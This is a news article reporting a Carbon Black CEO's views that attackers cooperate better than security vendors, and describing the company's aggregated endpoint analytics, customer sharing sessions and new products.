Infosec defenders' supply chain is inferior to black hats, says Carbon Black CEO
Cloudy analytics as an experience aggregator to the rescue? Maybe
The security industry’s supply chain is currently inferior to that of its attackers, says Carbon Black CEO Patrick Morley, but he thinks the industry is finding ways to fight back.
In conversation with The Register yesterday, Morley advanced a theory that exploit brokers, malware authors and other bad actors work together. Security vendors, by contrast, tend to work alone.
“We don’t do as good a job, as defenders,” he said. Matters aren’t helped by miscreants increasingly use “living off the land attacks” that require no malware. Instead they find a way in through tools everyone uses – email or browsers – and then seek out software on an endpoint that can do something nasty. That’s often something with known vulnerabilities, like PDF readers, or something like PowerShell that can pull a machine’s strings.
The evil supply chain works well in such scenarios because one player will create the poison web site, another will sell a zero-day to crack whatever’s found on an endpoint and a third will deliver and harvest the cryptocurrency-mining payload.
Happily Morley thinks that the industry is starting to network in useful ways that make all players’ wares more effective.
One way that security vendors are fighting back is with the kind of cloudy aggregation Carbon Black already practices. The company not only monitors its users’ endpoints for odd behaviour but combines data from all its clients so that it can look for patterns that represent attacks. The CEO spoke of being able to detect legitimate and malicious use of PowerShell through such analysis of aggregated experiences.
Another is by facilitating networking opportunities for users. Carbon Black’s conferences now include candid sharing sessions at which clients ‘fess up to their security scares. ServiceNow does something similar but in closed forums.
A third is by integrating with other security vendors. While confident in his own products’ protective powers, Morley admitted that he doesn’t have all the answers and that users will benefit from as much information as possible. That belief is why Carbon Black partners with networking and other security software vendors.
Carbon Black is also adding to its own services. The company is currently beta testing “LiveOps”, a tool Morley said stateful queries of endpoints and enables users to ask “almost any question I want of an endpoint” and another called “CB response”, a detection and response tool.
Asked by The Register if the new services suggest Carbon Black could expand into other fields that can benefit from a large pool of anonymised user data, Morley said that he sees multiple uses for the data Carbon Black collects. “The average user has 70 security products,” he said. If Carbon Black can help them to reduce that count by even five, he sees happy days ahead.
He also said that customers will buy into consolidation of the security industry, because a lot of security products were bought without a strategy. With more organisations hiring chief security officers, Morley believes buyers are now looking for platforms, not products. And he’s aiming to be the former. ®